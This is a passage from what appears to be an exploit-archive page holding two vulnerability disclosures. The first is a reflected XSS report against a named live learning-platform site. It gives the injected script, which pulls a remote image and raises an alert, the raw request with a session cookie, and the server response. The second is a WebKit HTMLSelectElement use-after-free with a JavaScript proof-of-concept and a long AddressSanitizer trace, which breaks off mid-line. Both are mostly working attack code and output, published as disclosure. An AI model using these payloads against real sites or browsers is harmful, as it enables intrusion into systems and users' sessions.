/>src='https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/XSS-image/image/kostaakatil.webp?token=GHSAT0AAAAAABTHSDC76YMVBQKZ7VLVFSBAYTHWGMQ'></img>");<br />}; window.onload = a; alert("A Hidden scripted image, warning you are<br />vulnerable!");</script>sad4r HTTP/2<br />Host: www.spotlms-anca-001.ovh<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63<br />Safari/537.36<br />Cache-Control: max-age=0<br />Cookie: PHPSESSID=7affe3c03b941d681047eea2ed6a5809;<br />_ga=GA1.2.688816030.1667823793; _gid=GA1.2.466977147.1667823793;<br />_gat=1<br />Upgrade-Insecure-Requests: 1<br />Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"<br />Sec-Ch-Ua-Platform: Windows<br />Sec-Ch-Ua-Mobile: ?0<br />Content-Length: 0<br />```<br />[+]Responce:<br /><br />```<br />pagespeed.CriticalImages.Run('/mod_pagespeed_beacon','https://www.spotlms-anca-001.ovh/forgetpw.php/qnlxv%22%3E%3Cscript%3Efunction','lJlesnYP1D',true,false,'eZpCFSK_6xQ');<br />//]]></script><img class="img-fluid mx-auto d-block" alt="LOGO"<br />src="/images/logos/logo-aurorae-v0.png" width="176" height="65"<br />data-pagespeed-url-hash="3925108827"<br />onload="pagespeed.CriticalImages.checkImageForCriticality(this);"/><br /> <center><br /> <p class="mt-3">A validation code will be sent to<br />your email to authorize the password reset operation</p><br /> </center><br />```<br /><br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/spotlms.us/2022/SPOT-LMS-Latest)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/y4gz1n)<br /><br />## Time spent<br />`1:45`<br /></code></pre>
<pre><code>WebKit use-after-free in HTMLSelectElement<br /><br />There is a use-after-free in HTMLSelectElement. If the length of the HTMLSelectElement is set to a value greater than the existing options length then dummy HTMLOptionElements elements are created. These HTMLOptionsElements are stored as raw pointers in HTMLSelectElement::m_listItems.<br /><br />When `surroundElements()` {1} is called, all children of the parent element (`selectElement`) are replaced. The second time this is called it frees all of the dummy HTMLOptionElements. However `m_listItems` still holds pointers to all of these freed elements, causing the UAF when we attempt to access the `selectElement.length` {2}.<br /><br />Vulnerability confirmed on ASAN build of WebKit on OSX and WebkitGTK as of commit 742112a9a30b00bbcab5ed1abb45819be0f271c2<br /><br />===========================================================<br /> Proof of Concept<br />==========================================================<br /><script><br />function jsfuzzer() {<br /> window.addEventListener(\"DOMNodeRemoved\", eventhandler3);<br /> svgvar00024.append(svgvar00021);<br />}<br /><br />var i = 0;<br />function eventhandler3() {<br /> i++;<br /> if (i > 1) { window.removeEventListener(\"DOMNodeRemoved\", eventhandler3); }<br /><br /> var var00001 = document.createRange();<br /> try { var00001.surroundContents(selectElement); } catch(e) { } // {1}<br /> selectElement.length = 2; // {2}<br /><br /> // {3} - Need 1 of these 2 lines<br /> console.log(selectElement.length);<br /> //var var00170 = selectElement.item(1%selectElement.length);<br />}<br /><br /></script><br /><body onload=jsfuzzer()><br /><svg id=\"svgvar00001\" ><br /> <glyph id=\"svgvar00021\"/><br /> <altGlyph id=\"svgvar00024\"/><br /></svg><br /><select id=\"selectElement\">a</select><br /><br />===========================================================<br /> ASAN Report<br />===========================================================<br />=================================================================<br />==46529==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c000091ae0 at pc 0x00014bab89eb bp 0x7ff7b90a6b80 sp 0x7ff7b90a6b78<br />READ of size 8 at 0x60c000091ae0 thread T0<br />==46529==WARNING: invalid path to external symbolizer!<br />==46529==WARNING: Failed to use and restart external symbolizer!<br /> #0 0x14bab89ea in WebCore::QualifiedName::localName() const+0x2a (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2449ea)<br /> #1 0x14bab89a1 in WebCore::Element::hasLocalName(WTF::AtomString const&) const+0x11 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2449a1)<br /> #2 0x14bab842b in WebCore::HTMLElement::hasTagName(WebCore::HTMLQualifiedName const&) const+0x1b (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24442b)<br /> #3 0x14e7274af in WTF::TypeCastTraits<WebCore::HTMLOptionElement const, WebCore::HTMLElement const, false>::checkTagName(WebCore::HTMLElement const&)+0x1f (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2eb34af)<br /> #4 0x14e727488 in WTF::TypeCastTraits<WebCore::HTMLOptionElement const, WebCore::HTMLElement const, false>::isOfType(WebCore::HTMLElement const&)+0x8 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2eb3488)<br /> #5 0x14e7207e8 in bool WTF::is<WebCore::HTMLOptionElement, WebCore::HTMLElement>(WebCore::HTMLElement&)+0x8 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2eac7e8)<br /> #6 0x14f92b151 in WebCore::HTMLSelectElement::length() const+0x61 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x40b7151)<br /> #7 0x14f92b284 in WebCore::HTMLSelectElement::setLength(unsigned int)+0xf4 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x40b7284)<br /> #8 0x14f9141b2 in WebCore::HTMLOptionsCollection::setLength(unsigned int)+0x22 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x40a01b2)<br /> #9 0x14c9fce34 in WebCore::setJSHTMLOptionsCollection_lengthSetter(JSC::JSGlobalObject&, WebCore::JSHTMLOptionsCollection&, JSC::JSValue)::'lambda'()::operator()() const+0x54 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1188e34)<br /> #10 0x14c9fccf6 in void WebCore::invokeFunctorPropagatingExceptionIfNecessary<WebCore::setJSHTMLOptionsCollection_lengthSetter(JSC::JSGlobalObject&, WebCore::JSHTMLOptionsCollection&, JSC::JSValue)::'lambda'()>(JSC::JSGlobalObject&, JSC::ThrowScope&, WebCore::setJSHTMLOptionsCollection_lengthSetter(JSC::JSGlobalObject&, WebCore::JSHTMLOptionsCollection&, JSC::JSValue)::'lambda'()&&)+0xd6 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1188cf6)<br /> #11 0x14c9fca52 in WebCore::setJSHTMLOptionsCollection_lengthSetter(JSC::JSGlobalObject&, WebCore::JSHTMLOptionsCollection&, JSC::JSValue)+0x292 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1188a52)<br /> #12 0x14c8fdb43 in bool WebCore::IDLAttribute<WebCore::JSHTMLOptionsCollection>::set<&(WebCore::setJSHTMLOptionsCollection_lengthSetter(JSC::JSGlobalObject&, WebCore::JSHTMLOptionsCollection&, JSC::JSValue)), (WebCore::CastedThisErrorBehavior)0>(JSC::JSGlobalObject&, long long, long long, JSC::PropertyName)+0x113 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1089b43)<br /> #13 0x14c8fda28 in WebCore::setJSHTMLOptionsCollection_length(JSC::JSGlobalObject*, long long, long long, JSC::PropertyName)+0x8 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1089a28)<br /> #14 0x13e4f5eb9 in WTF::FunctionPtr<(WTF::PtrTag)30177, bool (JSC::JSGlobalObject*, long long, long long, JSC::PropertyName), (WTF::FunctionAttributes)1>::operator()(JSC::JSGlobalObject*, long long, long long, JSC::PropertyName) const+0x29 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x3641eb9)<br /> #15 0x13e636ad4 in JSC::JSObject::putInlineSlow(JSC::JSGlobalObject*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&)+0xb14 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x3782ad4)<br /> #16 0x13e60f947 in JSC::JSObject::put(JSC::JSCell*, JSC::JSGlobalObject*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&)+0x8b7 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x375b947)<br /> #17 0x14c8efc49 in WebCore::JSHTMLOptionsCollection::put(JSC::JSCell*, JSC::JSGlobalObject*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&)+0x689 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x107bc49)<br /> #18 0x13de96858 in llint_slow_path_put_by_id+0x2008 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x2fe2858)<br /> #19 0x13be40b5c in llint_entry+0xae2a (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xf8cb5c)<br /> #20 0x13be35b28 in vmEntryToJavaScript+0xd7 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xf81b28)<br /> #21 0x13d8a7a74 in JSC::Interpreter::executeCall(JSC::JSGlobalObject*, JSC::JSObject*, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&)+0x654 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x29f3a74)<br /> #22 0x13e2839b9 in JSC::call(JSC::JSGlobalObject*, JSC::JSValue, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&)+0x49 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x33cf9b9)<br /> #23 0x13e283aaf in JSC::call(JSC::JSGlobalObject*, JSC::JSValue, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&)+0xdf (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x33cfaaf)<br /> #24 0x13e283e6b in JSC::profiledCall(JSC::JSGlobalObject*, JSC::ProfilingReason, JSC::JSValue, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&)+0x10b (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x33cfe6b)<br /> #25 0x14e953c5f in WebCore::JSExecState::profiledCall(JSC::JSGlobalObject*, JSC::ProfilingReason, JSC::JSValue, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&)+0x10f (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x30dfc5f)<br /> #26 0x14e9846d5 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&)+0xb05 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x31106d5)<br /> #27 0x14f3c8c12 in WebCore::EventTarget::innerInvokeEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener, WTF::RawPtrTraits<WebCore::RegisteredEventListener>, WTF::DefaultRefDerefTraits<WebCore::RegisteredEventListener> >, 1ul, WTF::CrashOnOverflow, 2ul, WTF::FastMalloc>, WebCore::EventTarget::EventInvokePhase)+0x522 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b54c12)<br /> #28 0x14f3c84e8 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WebCore::EventTarget::EventInvokePhase)+0x148 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b544e8)<br /> #29 0x14f3932f9 in WebCore::EventContext::handleLocalEvents(WebCore::Event&, WebCore::EventTarget::EventInvokePhase) const+0x429 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b1f2f9)<br /> #30 0x14f3bbf5c in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&)+0x11c (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b47f5c)<br /> #31 0x14f3bb390 in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&)+0x5b0 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b47390)<br /> #32 0x14f44ba38 in WebCore::Node::dispatchEvent(WebCore::Event&)+0x8 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3bd7a38)<br /> #33 0x14f4990f7 in WebCore::ScopedEventQueue::dispatchEvent(WebCore::ScopedEventQueue::ScopedEvent const&) const+0xa7 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3c250f7)<br /> #34 0x14f498f32 in WebCore::ScopedEventQueue::enqueueEvent(WTF::Ref<WebCore::Event, WTF::RawPtrTraits<WebCore::Event> >&&)+0x152 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3c24f32)<br /> #35 0x14f3bab17 in WebCore::EventDispatcher::dispatchScopedEvent(WebCore::Node&, WebCore::Event&)+0x1b7 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b46b17)<br /> #36 0x14f44ba28 in WebCore::Node::dispatchScopedEvent(WebCore::Event&)+0x8 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3bd7a28)<br /> #37 0x14f22b8fe in WebCore::dispatchChildRemovalEvents(WTF::Ref<WebCore::Node, WTF::RawPtrTraits<WebCore::Node> >&)+0x26e (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b78fe)<br /> #38 0x14f21a1dd in WebCore::ContainerNode::removeChild(WebCore::Node&)+0x26d (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39a61dd)<br /> #39 0x14f219663 in WebCore::ContainerNode::removeSelfOrChildNodesForInsertion(WebCore::Node&, WTF::Vector<WTF::Ref<WebCore::Node, WTF::RawPtrTraits<WebCore::Node> >, 11ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>&)+0x313 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39a5663)<br /> #40 0x14f21ca80 in WebCore::ContainerNode::appendChildWithoutPreInsertionValidityCheck(WebCore::Node&)+0x1b0 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39a8a80)<br /> #41 0x14f220e62 in WebCore::ContainerNode::appendChild(WebCore::Node&)+0x132 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39ace62)<br /> #42 0x14f2244f2 in WebCore::ContainerNode::append(WTF::FixedVector<std::__1::variant<WTF::RefPtr<WebCore::Node, WTF::RawPtrTraits<WebCore::Node>, WTF::DefaultRefDerefTraits<WebCore::Node> >, WTF::String> >&&)+0x172 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b04f2)<br /> #43 0x14c492fc2 in WebCore::jsElementPrototypeFunction_appendBody(JSC::JSGlobalObject*, JSC::CallFrame*, WebCore::JSElement*)::'lambda'()::operator()() const+0x42 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xc1efc2)<br /> #44 0x14c492e02 in JSC::JSValue WebCore::toJS<WebCore::IDLUndefined, WebCore::jsElementPrototypeFunction_appendBody(JSC::JSGlobalObject*, JSC::CallFrame*, WebCore::JSElement*)::'lambda'()>(JSC::JSGlobalObject&, JSC::ThrowScope&, WebCore::jsElementPrototypeFunction_appendBody(JSC::JSGlobalObject*, JSC::CallFrame*, WebCore::JSElement*)::'lambda'()&&)+0xe2 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xc1ee02)<br /> #45 0x14c492b0c in WebCore::jsElementPrototypeFunction_appendBody(JSC::JSGlobalObject*, JSC::CallFrame*, WebCore::JSElement*)+0x27c (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xc1eb0c)<br /> #46 0x14c492801 in long long WebCore::IDLOperation<WebCore::JSElement>::call<&(WebCore::jsElementPrototypeFunction_appendBody(JSC::JSGlobalObject*, JSC::CallFrame*, WebCore::JSElement*)), (WebCore::CastedThisErrorBehavior)0>(JSC::JSGlobalObject&, JSC::CallFrame&, char const*)+0x101 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xc1e801)<br /> #47 0x14c479738 in WebCore::jsElementPrototypeFunction_append(JSC::JSGlobalObject*, JSC::CallFrame*)+0x8 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xc05738)<br /> #48 0x2d205540c037 (<unknown module>)<br /> #49 0x13be52ead in llint_entry+0x1d17b (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xf9eead)<br /> #50 0x13be35b28 in vmEntryToJavaScript+0xd7 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xf81b28)<br /> #51 0x13d8a7a74 in JSC::Interpreter::executeCall(JSC::JSGlobalObject*, JSC::JSObject*, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&)+0x654 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x29f3a74)<br /> #52 0x13e2839b9 in JSC::call(JSC::JSGlobalObject*, JSC::JSValue, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&)+0x49 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x33cf9b9)<br /> #53 0x13e283aaf in JSC::call(JSC::JSGlobalObject*, JSC::JSValue, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&)+0xdf (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x33cfaaf)<br /> #54 0x13e283e6b in JSC::profiledCall(JSC::JSGlobalObject*, JSC::ProfilingReason, JSC::JSValue, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&)+0x10b (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x33cfe6b)<br /> #55 0x14e953c5f in WebCore::JSExecState::profiledCall(JSC::JSGlobalObject*, JSC::ProfilingReason, JSC::JSValue, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&)+0x10f (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x30dfc5f)<br /> #56 0x14e9846d5 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&)+0xb05 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x31106d5)<br /> #57 0x14f3c8c12 in WebCore::EventTarget::innerInvokeEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener, WTF::RawPtrTraits<WebCore::RegisteredEventListener>, WTF::DefaultRefDerefTraits<WebCore::RegisteredEventListener> >, 1ul, WTF::CrashOnOverflow, 2ul, WTF::FastMalloc>, WebCore::EventTarget::EventInvokePhase)+0x522 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b54c12)<br /> #58 0x14f3c84e8 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WebCore::EventTarget::EventInvokePhase)+0x148 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b544e8)<br /> #59 0x14f3932f9 in WebCore::EventContext::handleLocalEvents(WebCore::Event&, WebCore::EventTarget::EventInvokePhase) const+0x429 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b1f2f9)<br /> #60 0x14f3bbf5c in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&)+0x11c (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b47f5c)<br /> #61 0x14f3bb390 in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&)+0x5b0 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b47390)<br /> #62 0x14f44ba38 in WebCore::Node::dispatchEvent(WebCore::Event&)+0x8 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3bd7a38)<br /> #63 0x14f4990f7 in WebCore::ScopedEventQueue::dispatchEvent(WebCore::ScopedEventQueue::ScopedEvent const&) const+0xa7 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3c250f7)<br /> #64 0x14f498f32 in WebCore::ScopedEventQueue::enqueueEvent(WTF::Ref<WebCore::Event, WTF::RawPtrTraits<WebCore::Event> >&&)+0x152 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3c24f32)<br /> #65 0x14f3bab17 in WebCore::EventDispatcher::dispatchScopedEvent(WebCore::Node&, WebCore::Event&)+0x1b7 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b46b17)<br /> #66 0x14f44ba28 in WebCore::Node::dispatchScopedEvent(WebCore::Event&)+0x8 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3bd7a28)<br /> #67 0x14f44bc07 in WebCore::Node::dispatchSubtreeModifiedEvent()+0x1c7 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3bd7c07)<br /> #68 0x14f37d8d3 in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomString const&)+0x143 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b098d3)<br /> #69 0x14f37306a in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomString const&, WebCore::Element::SynchronizationOfLazyAttribute)+0x16a (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3aff06a)<br /> #70 0x14f3726bc in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomString const&, WebCore::Element::SynchronizationOfLazyAttribute)+0x13c (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3afe6bc)<br /> #71 0x14f372c9c in WebCore::Element::setAttribute(WTF::AtomString const&, WTF::AtomString const&)+0x44c (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3afec9c)<br /> #72 0x14c47b9ec in WebCore::jsElementPrototypeFunction_setAttributeBody(JSC::JSGlobalObject*, JSC::CallFrame*, WebCore::JSElement*)::'lambda'()::operator()() const+0x5c (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xc079ec)<br /> #73 0x14c47b812 in JSC::JSValue WebCore::toJS<WebCore::IDLUndefined, WebCore::jsElementPrototypeFunction_setAttributeBody(JSC::JSGlobalObject*, JSC::CallFrame*, WebCore::JSElement*)::'lambda'()>(JSC::JSGlobalObject&, JSC::ThrowScope&, WebCore::jsElementPrototypeFunction_setAttributeBody(JSC::JSGlobalObject*, JSC::CallFrame*, WebCore::JSElement*)::'lambda'()&&)+0xe2 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xc07812)<br /> #74 0x14c47b3ee in WebCore::jsElementPrototypeFunction_setAttributeBody(JSC::JSGlobalObject*, JSC::CallFrame*, WebCore::JSElement*)+0x3ae (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xc073ee)<br /> #75 0x14c47afb1 in long long WebCore::IDLOperation<WebCore::JSElement>::call<&(WebCore::jsElementPrototypeFunction_setAttributeBody(JSC::JSGlobalObject*, JSC::CallFrame*, WebCore::JSElement*)), (WebCore::CastedThisErrorBehavior)0>(JSC::JSGlobalObject&, JSC::CallFrame&, char const*)+0x101 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xc06fb1)<br /> #76 0x14c479488 in WebCore::jsElementPrototypeFunction_setAttribute(JSC::JSGlobalObject*, JSC::CallFrame*)+0x8 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xc05488)<br /> #77 0x2d205540c037 (<unknown module>)<br /> #78 0x13be52ead in llint_entry+0x1d17b (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xf9eead)<br /> #79 0x13be52ead in llint_entry+0x1d17b (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xf9eead)<br /> #80 0x13be35b28 in vmEntryToJavaScript+0xd7 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xf81b28)<br /> #81 0x13d8a7a74 in JSC::Interpreter::executeCall(JSC::JSGlobalObject*, JSC::JSObject*, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&)+0x654 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x29f3a74)<br /> #82 0x13e2839b9 in JSC::call(JSC::JSGlobalObject*, JSC::JSValue, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&)+0x49 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x33cf9b9)<br /> #83 0x13e283aaf in JSC::call(JSC::JSGlobalObject*, JSC::JSValue, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&)+0xdf (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x33cfaaf)<br /> #84 0x13e283e6b in JSC::profiledCall(JSC::JSGlobalObject*, JSC::ProfilingReason, JSC::JSValue, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&)+0x10b (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x33cfe6b)<br /> #85 0x14e953c5f in WebCore::JSExecState::profiledCall(JSC::JSGlobalObject*, JSC::ProfilingReason, JSC::JSValue, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&)+0x10f (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x30dfc5f)<br /> #86 0x14e9846d5 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&)+0xb05 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x31106d5)<br /> #87 0x14f3c8c12 in WebCore::EventTarget::innerInvokeEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener, WTF::RawPtrTraits<WebCore::RegisteredEventListener>, WTF::DefaultRefDerefTraits<WebCore::RegisteredEventListener> >, 1ul, WTF::CrashOnOverflow, 2ul, WTF::FastMalloc>, WebCore::EventTarget::EventInvokePhase)+0x522 